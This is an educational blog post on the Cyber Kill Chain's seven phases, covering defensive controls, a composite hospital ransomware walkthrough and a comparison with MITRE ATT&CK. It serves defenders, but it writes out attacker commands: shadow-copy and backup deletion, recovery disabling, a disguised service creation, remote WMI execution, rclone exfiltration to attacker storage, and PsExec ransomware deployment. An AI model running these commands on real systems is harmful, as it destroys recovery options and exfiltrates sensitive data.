Cyber Kill Chain: All 7 Phases Explained with Real Attack Examples (2026)

In 2020, a ransomware gang spent 11 days inside a hospital network before anyone noticed. By the time the alert fired, they had already exfiltrated 250 GB of patient data, deleted every shadow copy, and staged the encryptor on 1,200 endpoints. The ransom demand: $67 million.

Every step of that intrusion was predictable. Every step had a detection opportunity. And almost every one was missed — not because the tools weren't there, but because no one had mapped the attack sequence to their defenses.

That's exactly what the Cyber Kill Chain is for.

Developed by Lockheed Martin in 2011 and based on military targeting doctrine, the Cyber Kill Chain® framework defines the 7 sequential phases every attacker must complete to achieve their objectives. The core principle is operationally powerful: disrupt any single phase and the entire attack fails.

This post covers all 7 kill chain phases with real attacker tooling, IOCs to hunt for, defensive controls at each stage, a full real-world attack walkthrough, and a practical comparison of Kill Chain vs MITRE ATT&CK.

TL;DR — Cyber Kill Chain 7 Phases

Phase 1 – Reconnaissance     → Attacker gathers intelligence (OSINT, email harvesting)
Phase 2 – Weaponization      → Malware + exploit combined into a deliverable payload
Phase 3 – Delivery           → Payload sent via phishing, USB, watering hole
Phase 4 – Exploitation       → Vulnerability triggered, code executes on victim system
Phase 5 – Installation       → Backdoor / persistence mechanism installed
Phase 6 – Command & Control  → C2 channel established for remote access and tasking
Phase 7 – Actions on Objectives → Exfiltration, ransomware deployment, destruction

Break the chain at any phase → attack fails. The earlier you break it, the lower the cost.

Phase 1: Reconnaissance

The attacker maps the target before sending a single packet. Reconnaissance is entirely passive from the defender's perspective — no logs are generated, no alerts fire. It is simultaneously the hardest phase to detect and the easiest to limit through attack surface management.

What attackers do:

Email harvesting — tools like theHarvester and Hunter.io enumerate employee email addresses from public sources. These become spearphishing targets.
Subdomain enumeration — passive DNS, certificate transparency logs (crt.sh), and tools like amass surface forgotten dev/staging environments and exposed internal services.
LinkedIn / social media profiling — job postings reveal technology stacks and internal tooling. Employee profiles expose org hierarchy, project names, and reporting relationships — all useful for pretexting.
Shodan / Censys — internet-wide scan databases let attackers find exposed ports, service banners, and software versions without generating a single connection log on your side.

# Attacker tooling commonly seen in this phase
theHarvester -d target.com -b all         # email, subdomain enumeration
amass enum -passive -d target.com         # passive subdomain mapping
shodan search "org:TargetCompany"         # find exposed services without touching them

What to watch for: You won't see this phase in your logs. The right approach is to run the same tools against your own infrastructure before the attacker does. If theHarvester returns 200 employee emails, the attacker has them too.

Defensive posture:

Run periodic OSINT assessments against your own domain (treat it as a red team exercise)
Standardize email format — mixing first.last@ and firstlast@ makes enumeration trivial
Remove unnecessary service banners and metadata from public-facing infrastructure
Limit what job postings reveal about internal technology stack

Phase 2: Weaponization

With target intelligence in hand, the attacker builds or procures their weapon. This phase happens entirely off your network — there is no detection opportunity. Your defenses need to catch the artifact when it arrives, not when it's built.

What attackers do:

Malicious Office documents — macros or VBA scripts embedded in .docx/.xls files, executing on open. Despite macro execution controls improving, this remains one of the highest-volume initial access vectors due to user bypass.
Trojanized executables — legitimate-looking binaries with embedded malware, sometimes signed with stolen code-signing certificates to pass AV checks and user scrutiny.
Custom implant development — APT groups (APT29, Lazarus Group, APT41) develop bespoke malware per campaign to defeat signature detection. SUNBURST, the implant used in the SolarWinds supply chain attack, operated undetected for over 9 months inside government and enterprise networks.
Ransomware-as-a-Service (RaaS) — criminal affiliates purchase pre-built payloads (LockBit 3.0, BlackCat/ALPHV, Cl0p) from darkweb markets. RaaS has commoditized sophisticated attack capability, lowering the technical bar significantly.

The attacker also selects and registers C2 infrastructure at this stage — a decision that shapes detection risk in Phase 6.

Defensive posture:

Subscribe to threat intelligence feeds (MISP, OpenCTI, commercial TI) to surface known malware families and IOCs before delivery
Use behavioral sandbox analysis (ANY.RUN, Cuckoo, Joe Sandbox) — hash-based detection misses custom malware entirely
Monitor certificate transparency logs for newly registered lookalike domains targeting your brand

Phase 3: Delivery

The payload reaches the victim. This is the first genuine detection opportunity — the attacker must interact with your environment for the first time.

The three primary delivery vectors:

Phishing / Spearphishing Email

The dominant delivery method across virtually every threat actor category. Spearphishing is personalized with reconnaissance data — sender spoofed as a known contact, content referencing real internal context.

Attack scenario:
1. Attacker identifies CFO + their accountant's name via LinkedIn
2. Registers lookalike domain: acc0untant-corp.com (zero instead of O)
3. Sends fake "Invoice Q1-2026.xlsx" with embedded macro to CFO
4. CFO opens attachment → macro executes → Meterpreter session established

USB / Removable Media

Physical delivery with surprisingly high success rates. The 2022 FIN7 campaign involved USB drives mailed to US defense and transportation companies posing as Best Buy gift packages. Stuxnet — still the most sophisticated cyberweapon ever publicly analyzed — used infected USB drives to cross air-gapped networks inside Iranian nuclear facilities at Natanz.

Watering Hole Attack

The attacker compromises a website the target community regularly visits, injecting a drive-by download exploit. The victim navigates to a legitimate-looking site and the payload executes silently. Highly effective against specific industries where browsing patterns are predictable: security researcher blogs, defense contractor portals, industry-specific trade forums.

Defensive posture:

Email security gateway with sandbox detonation (Proofpoint, Mimecast, Microsoft Defender for Office 365)
URL filtering and DNS-based blocking (Cisco Umbrella, Cloudflare Gateway)
Disable macros by default via Group Policy; enforce Attack Surface Reduction (ASR) rules
Phishing simulation programs (KnowBe4, Proofpoint Security Awareness) — measurably reduce click rates over time

Phase 4: Exploitation

The payload executes. The attacker triggers a vulnerability — in software, OS, firmware, or human behavior — to gain an initial foothold on the target system.

Common exploitation techniques:

User-triggered execution — victim opens attachment, clicks link, runs a downloaded file. The majority of commodity phishing campaigns rely on this; no CVE required.
Zero-day exploits — unknown vulnerabilities with no available patch. Zero detection opportunity at point of exploitation. High acquisition cost means these are typically reserved for nation-state operations targeting high-value individuals or critical infrastructure.
Public-facing service exploitation — unpatched vulnerabilities in perimeter devices and enterprise software:
- CVE-2021-44228 (Log4Shell) — unauthenticated RCE in Apache Log4j, impacted millions of systems across virtually every industry
- CVE-2021-26855 (ProxyLogon) — pre-authentication RCE in Microsoft Exchange, exploited by HAFNIUM and multiple other APT groups
- CVE-2023-4966 (Citrix Bleed) — session token leakage in Citrix NetScaler, exploited within days of disclosure
Post-exploitation lateral movement — after initial access, attackers pivot internally using credential theft (Pass-the-Hash, Kerberoasting), abused trust relationships, or misconfigured services. Mapped under MITRE ATT&CK Lateral Movement tactic (TA0008).

Defensive posture:

Prioritize patching using the CISA KEV (Known Exploited Vulnerabilities) catalog — not CVSS score alone
EDR with behavioral detection (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint)
Network segmentation and micro-segmentation to contain blast radius
Principle of least privilege — every account should have only the access required for its function

Phase 5: Installation

Initial access achieved. Now the attacker establishes persistence — guaranteeing re-entry even if the vulnerability is patched, the system reboots, or the initial session is detected and removed.

Persistence mechanisms:

Web Shells

Malicious scripts (PHP, ASPX, JSP) planted on compromised web servers. The file extension blends with legitimate application content, making detection without FIM or behavioral monitoring extremely difficult.

<!-- Web shell concept — detection awareness only, not functional -->
<!-- Typically: single-line scripts accepting OS commands via HTTP GET/POST parameters -->
<!-- Hunt for: .php files in non-standard web directories, anomalous file creation events -->
<!-- Event to monitor: Sysmon Event ID 11 (FileCreate) in web server directories -->

Registry Run Keys / Startup Folder

# Attacker writes malicious entry to persist across reboots
# MITRE ATT&CK T1547.001
HKCU\Software\Microsoft\Windows\CurrentVersion\Run  → executes per user logon
HKLM\Software\Microsoft\Windows\CurrentVersion\Run  → executes for all users

# Detection: monitor registry write events (Sysmon Event ID 13)
# Tool: Autoruns (Sysinternals) to baseline and diff Run key entries

Windows Service Creation

# Attacker creates a service with a legitimate-sounding name
# MITRE ATT&CK T1543.003
sc.exe create "WindowsUpdateHelper" binPath= "C:\Windows\Temp\svchost32.exe" start= auto

# Detection: Windows Event ID 7045 (new service installed)
# Hunt for: services with binaries outside System32, recently created services

Timestomping

Attackers modify file metadata — creation, modification, and last-access timestamps — to make malicious files appear legitimate and defeat forensic timeline analysis. MITRE ATT&CK T1070.006.

Defensive posture:

File Integrity Monitoring (FIM) — Wazuh, OSSEC, Tripwire; alert on changes to sensitive directories
Audit Startup folder and Run keys against a known-good baseline (Autoruns from Sysinternals)
Alert on Windows Event ID 7045 (new service created)
Application whitelisting via WDAC or AppLocker to block execution of unauthorized binaries
Deploy Sysmon with a hardened config (SwiftOnSecurity or Olaf Hartong's modular config)

Phase 6: Command & Control (C2)

Persistence established. The compromised host now beacons — periodically checking in with attacker-controlled infrastructure to receive commands and stage exfiltrated data. The attacker has full keyboard access to the victim machine via an encrypted, covert channel.

Modern C2 channels:

HTTPS Beaconing (Most Common)

Malicious traffic blends with legitimate HTTPS on port 443. Tools like Cobalt Strike use "malleable C2 profiles" that mimic known CDN traffic patterns (Amazon, Akamai, Microsoft) at both the TLS handshake and HTTP request layer.

Detection indicators to hunt:
- Regular, low-variance beaconing intervals (every 60s, 300s)
  → Legitimate user traffic is irregular; malware beacons like a clock
- Unusual or recently issued TLS certificates on internal hosts
- High-volume POST requests to newly registered or low-reputation domains
- Cobalt Strike default: /submit.php endpoint, specific JA3 hash

DNS Tunneling

Data encoded within DNS query names, resolved against an attacker-controlled authoritative DNS server. Effective because DNS is almost never blocked at the enterprise perimeter.

# Detection: hunt for these DNS anomalies in your DNS logs
- Subdomain labels > 50 characters (encoded data)
- High query frequency to a single second-level domain
- Uncommon record types in responses (TXT, NULL, CNAME chains)
- Known tools: dnscat2, iodine, DNSExfiltrator, AAAA-encoded payloads

Domain Fronting

C2 traffic is routed through a trusted CDN (AWS CloudFront, Azure CDN, Cloudflare) using the CDN's legitimate IP address. The true destination is specified in the encrypted Host header. Your firewall logs show a connection to Amazon. The data reaches the attacker.

Defensive posture:

Network Traffic Analysis — Zeek, Suricata, Darktrace for behavioral anomaly detection
DNS monitoring and DGA (Domain Generation Algorithm) detection via frequency analysis
JA3/JA3S TLS fingerprinting to identify known C2 frameworks (Cobalt Strike, Sliver, Havoc)
Egress filtering — explicit allowlist for outbound destinations from sensitive network segments
SSL/TLS inspection on forward proxy for non-exempted traffic categories

Phase 7: Actions on Objectives

All prior phases exist to enable this one. The attacker executes their actual mission. Objectives vary significantly by threat actor type:

Threat Actor	Primary Objective
Ransomware group (Cl0p, LockBit)	Exfiltrate data → encrypt → double extortion
Nation-state APT (APT29, APT41)	Long-term espionage, IP theft, persistence
Hacktivist	Public disruption, defacement, data leaks
Insider threat	Targeted data theft, sabotage
Financial crime (FIN7, FIN11)	Credential theft, BEC fraud, wire transfers

Common actions:

Data exfiltration — sensitive files staged, compressed, and encrypted locally, then transferred over the C2 channel. In modern ransomware operations, exfiltration happens before encryption for double extortion leverage.
Privilege escalation — moving from standard user to Domain Admin. Common techniques: Kerberoasting, Pass-the-Hash, DCSync, token impersonation, exploiting misconfigured sudo or delegation.
Shadow Copy deletion — near-universal first step in ransomware deployment. Eliminates Windows recovery options.

# Consistently observed in ransomware incidents prior to encryption
vssadmin delete shadows /all /quiet         # delete volume shadow copies
wbadmin delete catalog -quiet               # destroy Windows Server backup catalog
bcdedit /set {default} recoveryenabled No  # disable recovery mode

Lateral movement to high-value targets — domain controllers, backup infrastructure, finance systems, and certificate authorities are primary pivot targets.
Destructive attacks — nation-state wipers (HermeticWiper used in Ukraine 2022, NotPetya 2017) overwrite the MBR and file contents. Designed to destroy evidence or cause maximum operational impact rather than financial gain.

Defensive posture:

Immutable, offline backups — 3-2-1 rule (3 copies, 2 different media types, 1 offsite). Test restores on a defined schedule; an untested backup is not a backup.
UEBA (User and Entity Behavior Analytics) to surface anomalous access patterns (Exabeam, Splunk UBA)
DLP (Data Loss Prevention) to alert on large-volume data staging or transfers
Privileged Access Workstations (PAW) + tiered administration model to contain lateral movement
Rehearsed Incident Response plan — tabletop exercises quarterly minimum

Real-World Cyber Kill Chain Example: Ransomware Attack Walkthrough

This is a composite walkthrough based on publicly documented ransomware TTPs (CISA advisories, Mandiant M-Trends, CrowdStrike reporting). No single incident — combined to illustrate how all 7 phases connect in practice.

Target: Regional healthcare provider, ~3,000 employees

Phase 1 — Reconnaissance (Day 1–3)

The threat actor identifies the organization via a healthcare industry targeting list. Using theHarvester and LinkedIn, they enumerate 400+ employee emails and identify the IT Director by name. A Shodan search returns a Citrix NetScaler appliance running a version vulnerable to CVE-2023-4966 (Citrix Bleed).

Phase 2 — Weaponization (Day 4–5)

The group is a RaaS affiliate using LockBit 3.0. The encryptor is pre-built. The affiliate configures a Cobalt Strike listener with an HTTPS malleable profile mimicking Microsoft Azure CDN traffic. C2 domain registered 6 days ago, hosted on a bulletproof hosting provider.

Phase 3 — Delivery (Day 6)

Rather than phishing, the attacker exploits the vulnerable Citrix appliance directly — no user interaction required. CVE-2023-4966 allows unauthenticated session token extraction. The attacker hijacks an active VPN session belonging to an IT administrator.

Phase 4 — Exploitation (Day 6, same day)

With a valid admin VPN session, the attacker authenticates to the Citrix gateway and accesses the internal network as a legitimate privileged user. No vulnerability triggered on internal systems — they walked in through the front door.

Phase 5 — Installation (Day 6–7)

The attacker deploys a Cobalt Strike beacon on a domain-joined Windows server. Persistence is established via a new Windows service (WindowsTelemetryHelper) and a registry Run key on a backup server. Timestomping applied to beacon DLL — file appears created 8 months prior.

Phase 6 — Command & Control (Day 6–17)

The beacon checks in every 5 minutes with 15% jitter over HTTPS to a domain fronted through Cloudflare. Eleven days of undetected activity: the attacker conducts internal reconnaissance, dumps LSASS for credential harvesting, moves laterally to the domain controller, and locates backup infrastructure.

# Attacker activity observed during C2 phase
net group "Domain Admins" /domain             # enumerate privileged groups
Get-ADComputer -Filter * | Select Name        # list all domain-joined systems
wmic /node:[backup-server] process call create "cmd.exe /c whoami"

Phase 7 — Actions on Objectives (Day 17–18)

With Domain Admin credentials and access to all systems:

# Exfiltration: 250 GB staged and sent via rclone to attacker cloud storage
rclone copy \\fileserver\patientdata\ remote:exfil-bucket --transfers 32

# Backup destruction before encryption
vssadmin delete shadows /all /quiet
wbadmin delete catalog -quiet

# LockBit 3.0 deployed via PsExec to 1,200 endpoints simultaneously
PsExec.exe \\[target] -c -f -d LockBit3.exe --silent

Ransom demand: $4.2 million. Recovery time without tested backups: estimated 3–5 weeks of partial operations.

Where the chain could have been broken:

Phase 1: Vulnerable Citrix version visible on Shodan — patch or restrict access
Phase 3/4: CVE-2023-4966 was in CISA KEV 11 days before this attack
Phase 6: Cobalt Strike beacon beaconing at regular intervals — NTA or EDR telemetry would have caught this
Phase 7: Shadow copy deletion is a high-confidence ransomware indicator — alert on vssadmin delete immediately

Cyber Kill Chain vs MITRE ATT&CK

One of the most common questions in threat modeling discussions is where these two frameworks fit relative to each other. They are complementary, not competing.

Dimension	Cyber Kill Chain	MITRE ATT&CK
Created by	Lockheed Martin (2011)	MITRE Corporation (2013)
Structure	7 sequential phases	14 tactics, 400+ techniques
Granularity	Strategic / phase-level	Tactical / technique-level
Best used for	Measuring defense coverage across an attack lifecycle	Detection engineering, threat hunting, red team planning
Attacker model	Single linear intrusion	Non-linear, technique-level behavior
Insider threat coverage	Poor (skips Phases 1–4)	Good (covers all behaviors post-access)
Tooling	N/A	ATT&CK Navigator, threat intel platforms

How to use both together:

Use the Kill Chain to answer the strategic question: "At which phases do we have coverage, and where are the gaps?"

Use MITRE ATT&CK to answer the tactical question: "For a given phase, which specific techniques should we detect, and how?"

For example: Kill Chain Phase 5 (Installation) maps to ATT&CK techniques including T1547.001 (Registry Run Keys), T1543.003 (Create/Modify System Process), T1070.006 (Timestomping), and T1505.003 (Web Shell). ATT&CK gives you the detection logic; the Kill Chain gives you the strategic context.

Breaking the Chain: Defense Coverage by Phase

Phase	Detection Difficulty	Primary Controls
Reconnaissance	Very Low	OSINT self-assessment, attack surface reduction
Weaponization	None	Threat intel feeds, sandbox detonation
Delivery	High	Email gateway + sandbox, URL filtering, macro policy
Exploitation	Medium	EDR behavioral detection, patch management (CISA KEV)
Installation	Medium	FIM, Sysmon, autoruns baselining, app whitelisting
Command & Control	High	NTA, DNS monitoring, JA3 fingerprinting, egress filtering
Actions on Objectives	Medium	Offline backups (tested), UEBA, DLP, IR runbooks

The goal is defense in depth: no single phase should rely on a single control. Assume breach at every layer and ensure the next layer catches what the previous missed.

Common Mistakes When Applying the Cyber Kill Chain

Mistake 1: Treating it as a linear checklist Real intrusions aren't always perfectly sequential. Attackers may loop back to reconnaissance post-exploitation (internal recon ≠ external recon), or skip phases when they have valid credentials from the start (e.g., phished MFA codes, purchased access from an Initial Access Broker).

Mistake 2: Over-indexing on late-stage detection Most security programs invest heavily in Exploitation and beyond — that's where EDR and SIEM shine. Delivery-phase controls (email sandboxing, phishing simulation, macro policy) often have higher ROI and stop attacks before any code runs.

Mistake 3: Ignoring Weaponization-phase intelligence ISAC (Information Sharing and Analysis Center) memberships and TI feeds often surface malware campaigns and C2 infrastructure before they hit your perimeter. Early warning at Phase 2 eliminates the attack before it reaches your environment.

Mistake 4: No tested backup and recovery Backup infrastructure that's documented but never restored from is not a recovery capability. Shadow Copy deletion + no tested offline backup = paying the ransom or rebuilding from scratch.

Mistake 5: Treating LotL as a blind spot Living-off-the-land techniques (PowerShell, WMI, certutil, mshta) blur phase boundaries and evade signature detection. Behavioral detection rules and PowerShell Script Block Logging (Event ID 4104) are essential to counter this.

Conclusion

Every major breach follows a predictable sequence. The Cyber Kill Chain gives you a framework to map your defenses to that sequence and find the gaps before an attacker exploits them.

The 7 kill chain phases aren't just academic categories — they're decision points. At each one, you either have a control in place that raises the cost for the attacker, or you don't. If your detection coverage only starts at Exploitation, you've already handed the attacker four uncontested phases.

Map your controls to the Kill Chain. Find the gaps. Prioritize fixes by attacker advantage — not by implementation effort.

→ Related: MITRE ATT&CK Explained: Tactics vs Techniques — the granular companion to the Kill Chain. → Related: What is a SOC? Roles, Tools, and Detection Workflows — how a SOC operationalizes Kill Chain detection at scale.

FAQ — Cyber Kill Chain

What is the Cyber Kill Chain?

The Cyber Kill Chain is a cybersecurity framework that models the 7 sequential phases an attacker must complete to successfully execute a cyberattack: Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command & Control, and Actions on Objectives. Originally developed by Lockheed Martin in 2011, it is used by security teams to map defensive controls to attacker behavior and identify coverage gaps.

Who created the Cyber Kill Chain?

The Cyber Kill Chain® was created by Lockheed Martin and published in their 2011 paper "Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains" by Eric Hutchins, Michael Cloppert, and Rohan Amin. It adapted the military concept of a "kill chain" — the sequence of steps required to engage a target — to the cyber intrusion domain.

Is the Cyber Kill Chain still relevant in 2026?

Yes, with caveats. The Kill Chain remains a valuable strategic framework for security program design and defense coverage measurement. Its limitations are well-understood: it models a single linear intrusion and doesn't account well for insider threats, living-off-the-land techniques, or non-linear attack sequences. In practice, most security teams use it alongside MITRE ATT&CK — the Kill Chain for strategic phase coverage, ATT&CK for technique-level detection engineering.

What is the difference between the Cyber Kill Chain and MITRE ATT&CK?

The Kill Chain provides a 7-phase strategic model of a complete attack lifecycle. MITRE ATT&CK provides granular coverage of 400+ individual adversary techniques across 14 tactics. They operate at different levels of abstraction and are best used together: the Kill Chain to identify which phases lack defensive coverage, ATT&CK to specify what behaviors to detect within those phases.

Why is the Cyber Kill Chain important for defenders?

Because it shifts the defensive mindset from reactive to proactive. Rather than waiting for an alert at Exploitation or later, the Kill Chain makes visible that there are detection opportunities as early as Delivery and Reconnaissance. It also frames defense as a cost-imposition problem: every control you add at every phase increases attacker effort and probability of detection — even if no single control is perfect. For SOC analysts, threat hunters, and IR teams, thinking in kill chain phases accelerates triage and focuses containment.

How many phases are in the Cyber Kill Chain?

The Cyber Kill Chain consists of 7 phases: (1) Reconnaissance, (2) Weaponization, (3) Delivery, (4) Exploitation, (5) Installation, (6) Command & Control, and (7) Actions on Objectives.

Tags: #cybersecurity #threatintel #blueteam #redteam #killchain #incidentresponse #apt #ransomware